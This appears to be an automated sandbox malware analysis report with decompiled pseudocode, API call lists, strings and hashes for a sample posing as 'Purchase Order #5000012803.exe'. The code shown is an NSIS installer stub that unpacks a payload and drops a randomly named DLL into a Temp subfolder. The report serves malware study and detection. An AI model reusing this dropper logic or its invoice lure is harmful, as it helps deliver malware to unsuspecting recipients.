                      							}
                      							ShowWindow( *0x420470, 5);
                      							_t37 = LoadLibraryA("RichEd20");
                      							__eflags = _t37;
                      							if(_t37 == 0) {
                      								LoadLibraryA("RichEd32");
                      							}
                      							_t85 = "RichEdit20A";
                      							_t38 = GetClassInfoA(0, _t85, 0x423640);
                      							__eflags = _t38;
                      							if(_t38 == 0) {
                      								GetClassInfoA(0, "RichEdit", 0x423640);
                      								 *0x423664 = _t85;
                      								RegisterClassA(0x423640);
                      							}
                      							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                      							E0040140B(5);
                      							return _t42;
                      						}
                      						L22:
                      						_t34 = 2;
                      						return _t34;
                      					} else {
                      						_t75 =  *0x423ea0;
                      						 *0x423654 = _t28;
                      						_v20 = 0x624e5f;
                      						 *0x423644 = E00401000;
                      						 *0x423650 =  *0x423ea0;
                      						 *0x423664 =  &_v20;
                      						if(RegisterClassA(0x423640) == 0) {
                      							L33:
                      							__eflags = 0;
                      							return 0;
                      						}
                      						_t12 =  &_v16; // 0x624e5f
                      						SystemParametersInfoA(0x30, 0, _t12, 0);
                      						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                      						goto L21;
                      					}
                      				} else {
                      					_t75 =  *(_t80 + 0x48);
                      					if(_t75 == 0) {
                      						goto L16;
                      					}
                      					_t78 = 0x422e40;
                      					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
                      					_t61 =  *0x422e40; // 0x69
                      					if(_t61 == 0) {
                      						goto L16;
                      					}
                      					if(_t61 == 0x22) {
                      						_t78 = 0x422e41;
                      						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                      					}
                      					_t63 = lstrlenA(_t78) + _t78 - 4;
                      					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                      						L15:
                      						E00405A85(_t84, E00405578(_t78));
                      						goto L16;
                      					} else {
                      						_t67 = GetFileAttributesA(_t78);
                      						if(_t67 == 0xffffffff) {
                      							L14:
                      							E004055BF(_t78);
                      							goto L15;
                      						}
                      						_t95 = _t67 & 0x00000010;
                      						if((_t67 & 0x00000010) != 0) {
                      							goto L15;
                      						}
                      						goto L14;
                      					}
                      				}
                      			}


























                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                      • lstrlenA.KERNEL32(icluciob,?,?,?,icluciob,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ), ref: 004036BF
                      • lstrcmpiA.KERNEL32(?,.exe,icluciob,?,?,?,icluciob,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                      • GetFileAttributesA.KERNEL32(icluciob), ref: 004036DD
                      • LoadImageA.USER32 ref: 00403726
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      • RegisterClassA.USER32 ref: 0040376D
                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                      • CreateWindowExA.USER32 ref: 004037BE
                      • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                      • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                      • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                      • GetClassInfoA.USER32 ref: 0040381C
                      • GetClassInfoA.USER32 ref: 00403829
                      • RegisterClassA.USER32 ref: 00403832
                      • DialogBoxParamA.USER32 ref: 00403851
                      Similarity
                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$icluciob
                      • API String ID: 914957316-1106978021
                      • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                      • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 192 402d02 190->192 193 402d04-402d0a call 4031a8 190->193 192->193 196 402d0f-402d11 193->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 203 402d9d-402da1 199->203 204 402d1f-402d37 call 40571d 199->204 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 224 402e02-402e04 202->224 212 402da3-402da9 call 402bc5 203->212 213 402daa-402db0 203->213 204->213 222 402d39-402d40 204->222 212->213 215 402db2-402dc0 call 405e0f 213->215 216 402dc3-402dcd 213->216 215->216 216->189 216->190 222->213 227 402d42-402d49 222->227 224->197 225 402e0a-402e10 224->225 225->197 225->201 227->213 230 402d4b-402d52 227->230 228->182 237 402ead-402eb0 229->237 230->213 232 402d54-402d5b 230->232 232->213 234 402d5d-402d7d 232->234 234->197 236 402d83-402d87 234->236 238 402d89-402d8d 236->238 239 402d8f-402d97 236->239 237->197 240 402eb9-402eca 237->240 238->189 238->239 239->213 243 402d99-402d9b 239->243 241 402ed2-402ed7 240->241 242 402ecc 240->242 244 402ed8-402ede 241->244 242->241 243->213 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                      C-Code - Quality: 96%
                      			E00402C5B(void* __eflags, signed int _a4) {
                      				long _v8;
                      				long _v12;
                      				intOrPtr _v16;
                      				long _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				signed int _v40;
                      				char _v300;
                      				signed int _t54;
                      				void* _t57;
                      				void* _t62;
                      				intOrPtr _t65;
                      				void* _t68;
                      				intOrPtr* _t70;
                      				intOrPtr _t71;
                      				signed int _t77;
                      				signed int _t82;
                      				signed int _t83;
                      				signed int _t89;
                      				intOrPtr _t92;
                      				signed int _t101;
                      				signed int _t103;
                      				void* _t105;
                      				signed int _t106;
                      				signed int _t109;
                      				void* _t110;
                      
                      				_v8 = 0;
                      				_v12 = 0;
                      				 *0x423eac = GetTickCount() + 0x3e8;
                      				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe", 0x400);
                      				_t105 = E0040575C("C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe", 0x80000000, 3);
                      				 *0x409010 = _t105;
                      				if(_t105 == 0xffffffff) {
                      					return "Error launching installer";
                      				}
                      				E00405A85("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe");
                      				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\Desktop"));
                      				_t54 = GetFileSize(_t105, 0);
                      				__eflags = _t54;
                      				 *0x41f048 = _t54;
                      				_t109 = _t54;
                      				if(_t54 <= 0) {
                      					L22:
                      					E00402BC5(1);
                      					__eflags =  *0x423eb4;
                      					if( *0x423eb4 == 0) {
                      						goto L30;
                      					}
                      					__eflags = _v12;
                      					if(_v12 == 0) {
                      						L26:
                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                      						_t110 = _t57;
                      						E00405E7D(0x40afb0);
                      						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                      						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                      						__eflags = _t62 - 0xffffffff;
                      						 *0x409014 = _t62;
                      						if(_t62 != 0xffffffff) {
                      							_t65 = E004031DA( *0x423eb4 + 0x1c);
                      							 *0x41f04c = _t65;
                      							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                      							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                      							__eflags = _t68 - _v20;
                      							if(_t68 == _v20) {
                      								__eflags = _v40 & 0x00000001;
                      								 *0x423eb0 = _t110;
                      								 *0x423eb8 =  *_t110;
                      								if((_v40 & 0x00000001) != 0) {
                      									 *0x423ebc =  *0x423ebc + 1;
                      									__eflags =  *0x423ebc;
                      								}
                      								_t45 = _t110 + 0x44; // 0x44
                      								_t70 = _t45;
                      								_t101 = 8;
                      								do {
                      									_t70 = _t70 - 8;
                      									 *_t70 =  *_t70 + _t110;
                      									_t101 = _t101 - 1;
                      									__eflags = _t101;
                      								} while (_t101 != 0);
                      								_t71 =  *0x41703c; // 0x3f276
                      								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                      								E0040571D(0x423ec0, _t110 + 4, 0x40);
                      								__eflags = 0;
                      								return 0;
                      							}
                      							goto L30;
                      						}
                      						return "Error writing temporary file. Make sure your temp folder is valid.";
                      					}
                      					E004031DA( *0x417038);
                      					_t77 = E004031A8( &_a4, 4); // executed
                      					__eflags = _t77;
                      					if(_t77 == 0) {
                      						goto L30;
                      					}
                      					__eflags = _v8 - _a4;
                      					if(_v8 != _a4) {
                      						goto L30;
                      					}
                      					goto L26;
                      				} else {
                      					do {
                      						_t106 = _t109;
                      						asm("sbb eax, eax");
                      						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
                      						__eflags = _t109 - _t82;
                      						if(_t109 >= _t82) {
                      							_t106 = _t82;
                      						}
                      						_t83 = E004031A8(0x417048, _t106); // executed
                      						__eflags = _t83;
                      						if(_t83 == 0) {
                      							E00402BC5(1);
                      							L30:
                      							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                      						}
                      						__eflags =  *0x423eb4;
                      						if( *0x423eb4 != 0) {
                      							__eflags = _a4 & 0x00000002;
                      							if((_a4 & 0x00000002) == 0) {
                      								E00402BC5(0);
                      							}
                      							goto L19;
                      						}
                      						E0040571D( &_v40, 0x417048, 0x1c);
                      						_t89 = _v40;
                      						__eflags = _t89 & 0xfffffff0;
                      						if((_t89 & 0xfffffff0) != 0) {
                      							goto L19;
                      						}
                      						__eflags = _v36 - 0xdeadbeef;
                      						if(_v36 != 0xdeadbeef) {
                      							goto L19;
                      						}
                      						__eflags = _v24 - 0x74736e49;
                      						if(_v24 != 0x74736e49) {
                      							goto L19;
                      						}
                      						__eflags = _v28 - 0x74666f73;
                      						if(_v28 != 0x74666f73) {
                      							goto L19;
                      						}
                      						__eflags = _v32 - 0x6c6c754e;
                      						if(_v32 != 0x6c6c754e) {
                      							goto L19;
                      						}
                      						_a4 = _a4 | _t89;
                      						_t103 =  *0x417038; // 0x310f2
                      						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                      						_t92 = _v16;
                      						__eflags = _t92 - _t109;
                      						 *0x423eb4 = _t103;
                      						if(_t92 > _t109) {
                      							goto L30;
                      						}
                      						__eflags = _a4 & 0x00000008;
                      						if((_a4 & 0x00000008) != 0) {
                      							L15:
                      							_v12 = _v12 + 1;
                      							_t109 = _t92 - 4;
                      							__eflags = _t106 - _t109;
                      							if(_t106 > _t109) {
                      								_t106 = _t109;
                      							}
                      							goto L19;
                      						}
                      						__eflags = _a4 & 0x00000004;
                      						if((_a4 & 0x00000004) != 0) {
                      							goto L22;
                      						}
                      						goto L15;
                      						L19:
                      						__eflags = _t109 -  *0x41f048; // 0x32abc
                      						if(__eflags < 0) {
                      							_v8 = E00405E0F(_v8, 0x417048, _t106);
                      						}
                      						 *0x417038 =  *0x417038 + _t106;
                      						_t109 = _t109 - _t106;
                      						__eflags = _t109;
                      					} while (_t109 > 0);
                      					goto L22;
                      				}
                      			}

                      APIs
                      • GetTickCount.KERNEL32 ref: 00402C6F
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order #5000012803.exe,00000400), ref: 00402C8B
                        • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 00405760
                        • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order #5000012803.exe,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 00402CD4
                      • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                      Strings
                      • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                      • soft, xrefs: 00402D4B
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                      • Error launching installer, xrefs: 00402CAB
                      • Null, xrefs: 00402D54
                      • "C:\Users\user\Desktop\Purchase Order #5000012803.exe" , xrefs: 00402C68
                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                      • C:\Users\user\Desktop\Purchase Order #5000012803.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                      • Inst, xrefs: 00402D42
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order #5000012803.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                      • API String ID: 2803837635-400477893
                      • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                      • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 342 4017a5-4017b7 334->342 343 401795-4017a3 CompareFileTime 334->343 337 4017c5-4017e1 call 40575c 335->337 338 4017bf-4017c0 call 40573d 335->338 345 4017e3-4017e6 337->345 346 401859-401882 call 404e23 call 402f01 337->346 338->337 342->335 343->342 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 358 401884-401888 346->358 359 40188a-401896 SetFileTime 346->359 347->333 381 401830-401831 347->381 360 40184e-401854 348->360 358->359 363 40189c-4018a7 FindCloseChangeNotification 358->363 359->363 364 402886 360->364 367 40287d-402880 363->367 368 4018ad-4018b0 363->368 366 402888-40288c 364->366 367->364 370 4018b2-4018c3 call 405aa7 lstrcatA 368->370 371 4018c5-4018c8 call 405aa7 368->371 377 4018cd-402205 call 405346 370->377 371->377 377->366 384 40264e-402655 377->384 381->360 383 401833-401834 381->383 383->348 384->367
                      C-Code - Quality: 75%
                      			E00401734(FILETIME* __ebx, void* __eflags) {
                      				void* _t33;
                      				void* _t41;
                      				void* _t43;
                      				FILETIME* _t49;
                      				FILETIME* _t62;
                      				void* _t64;
                      				signed int _t70;
                      				FILETIME* _t71;
                      				FILETIME* _t75;
                      				signed int _t77;
                      				void* _t80;
                      				CHAR* _t82;
                      				void* _t85;
                      
                      				_t75 = __ebx;
                      				_t82 = E004029E8(0x31);
                      				 *(_t85 - 8) = _t82;
                      				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                      				_t33 = E004055E5(_t82);
                      				_push(_t82);
                      				if(_t33 == 0) {
                      					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                      				} else {
                      					_push(0x409b68);
                      					E00405A85();
                      				}
                      				E00405CE3(0x409b68);
                      				while(1) {
                      					__eflags =  *(_t85 + 8) - 3;
                      					if( *(_t85 + 8) >= 3) {
                      						_t64 = E00405D7C(0x409b68);
                      						_t77 = 0;
                      						__eflags = _t64 - _t75;
                      						if(_t64 != _t75) {
                      							_t71 = _t64 + 0x14;
                      							__eflags = _t71;
                      							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                      						}
                      						asm("sbb eax, eax");
                      						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                      						__eflags = _t70;
                      						 *(_t85 + 8) = _t70;
                      					}
                      					__eflags =  *(_t85 + 8) - _t75;
                      					if( *(_t85 + 8) == _t75) {
                      						E0040573D(0x409b68);
                      					}
                      					__eflags =  *(_t85 + 8) - 1;
                      					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                      					__eflags = _t41 - 0xffffffff;
                      					 *(_t85 - 0x34) = _t41;
                      					if(_t41 != 0xffffffff) {
                      						break;
                      					}
                      					__eflags =  *(_t85 + 8) - _t75;
                      					if( *(_t85 + 8) != _t75) {
                      						E00404E23(0xffffffe2,  *(_t85 - 8));
                      						__eflags =  *(_t85 + 8) - 2;
                      						if(__eflags == 0) {
                      							 *((intOrPtr*)(_t85 - 4)) = 1;
                      						}
                      						L31:
                      						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                      						__eflags =  *0x423f28;
                      						goto L32;
                      					} else {
                      						E00405A85(0x40a368, 0x424000);
                      						E00405A85(0x424000, 0x409b68);
                      						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsgB0E.tmp\\ibqwlwmewvj.dll",  *((intOrPtr*)(_t85 - 0x10)));
                      						E00405A85(0x424000, 0x40a368);
                      						_t62 = E00405346("C:\\Users\\jones\\AppData\\Local\\Temp\\nsgB0E.tmp\\ibqwlwmewvj.dll",  *(_t85 - 0x24) >> 3) - 4;
                      						__eflags = _t62;
                      						if(_t62 == 0) {
                      							continue;
                      						} else {
                      							__eflags = _t62 == 1;
                      							if(_t62 == 1) {
                      								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                      								L32:
                      								_t49 = 0;
                      								__eflags = 0;
                      							} else {
                      								_push(0x409b68);
                      								_push(0xfffffffa);
                      								E00404E23();
                      								L29:
                      								_t49 = 0x7fffffff;
                      							}
                      						}
                      					}
                      					L33:
                      					return _t49;
                      				}
                      				E00404E23(0xffffffea,  *(_t85 - 8));
                      				 *0x423f54 =  *0x423f54 + 1;
                      				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                      				 *0x423f54 =  *0x423f54 - 1;
                      				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                      				_t80 = _t43;
                      				if( *(_t85 - 0x18) != 0xffffffff) {
                      					L22:
                      					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                      				} else {
                      					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                      					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                      						goto L22;
                      					}
                      				}
                      				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                      				__eflags = _t80 - _t75;
                      				if(_t80 >= _t75) {
                      					goto L31;
                      				} else {
                      					__eflags = _t80 - 0xfffffffe;
                      					if(_t80 != 0xfffffffe) {
                      						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                      					} else {
                      						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                      						lstrcatA(0x409b68,  *(_t85 - 8));
                      					}
                      					_push(0x200010);
                      					_push(0x409b68);
                      					E00405346();
                      					goto L29;
                      				}
                      				goto L33;
                      			}

                      APIs
                      • lstrcatA.KERNEL32(00000000,00000000,icluciob,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                      • CompareFileTime.KERNEL32(-00000014,?,icluciob,icluciob,00000000,00000000,icluciob,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                      • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsgB0E.tmp$C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll$icluciob
                      • API String ID: 1941528284-1666323670
                      • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                      • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 395 403024 392->395 393->392 394 402f68-402f7b call 40302c 393->394 394->390 398 402f81-402f84 394->398 395->390 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 401 402ff9 399->401 402 402ffc-40300f ReadFile 399->402 403 40301d-403020 400->403 404 402f8f 400->404 401->402 402->392 405 403011-40301a 402->405 403->390 406 402f94-402f9c 404->406 405->403 407 402fa1-402fb3 ReadFile 406->407 408 402f9e 406->408 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->395 413->406 414 402feb 413->414 414->403
                      C-Code - Quality: 93%
                      			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                      				long _v8;
                      				intOrPtr _v12;
                      				void _t31;
                      				intOrPtr _t32;
                      				int _t35;
                      				long _t36;
                      				int _t37;
                      				long _t38;
                      				int _t40;
                      				int _t42;
                      				long _t43;
                      				long _t44;
                      				long _t55;
                      				long _t57;
                      
                      				_t31 = _a4;
                      				if(_t31 >= 0) {
                      					_t44 = _t31 +  *0x423ef8;
                      					 *0x41703c = _t44;
                      					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                      				}
                      				_t57 = 4;
                      				_t32 = E0040302C(_t57);
                      				if(_t32 >= 0) {
                      					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                      					if(_t35 == 0 || _v8 != _t57) {
                      						L23:
                      						_push(0xfffffffd);
                      						goto L24;
                      					} else {
                      						 *0x41703c =  *0x41703c + _t57;
                      						_t32 = E0040302C(_a4);
                      						_v12 = _t32;
                      						if(_t32 >= 0) {
                      							if(_a12 != 0) {
                      								_t36 = _a4;
                      								if(_t36 >= _a16) {
                      									_t36 = _a16;
                      								}
                      								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                      								if(_t37 == 0) {
                      									goto L23;
                      								} else {
                      									_t38 = _v8;
                      									 *0x41703c =  *0x41703c + _t38;
                      									_v12 = _t38;
                      									goto L22;
                      								}
                      							} else {
                      								if(_a4 <= 0) {
                      									L22:
                      									_t32 = _v12;
                      								} else {
                      									while(1) {
                      										_t55 = 0x4000;
                      										if(_a4 < 0x4000) {
                      											_t55 = _a4;
                      										}
                      										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                      										if(_t40 == 0 || _t55 != _v8) {
                      											goto L23;
                      										}
                      										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                      										if(_t42 == 0 || _a16 != _t55) {
                      											_push(0xfffffffe);
                      											L24:
                      											_pop(_t32);
                      										} else {
                      											_t43 = _v8;
                      											_v12 = _v12 + _t43;
                      											_a4 = _a4 - _t43;
                      											 *0x41703c =  *0x41703c + _t43;
                      											if(_a4 > 0) {
                      												continue;
                      											} else {
                      												goto L22;
                      											}
                      										}
                      										goto L25;
                      									}
                      									goto L23;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				L25:
                      				return _t32;
                      			}


















                      APIs
                      • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                      • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                      • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                      • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
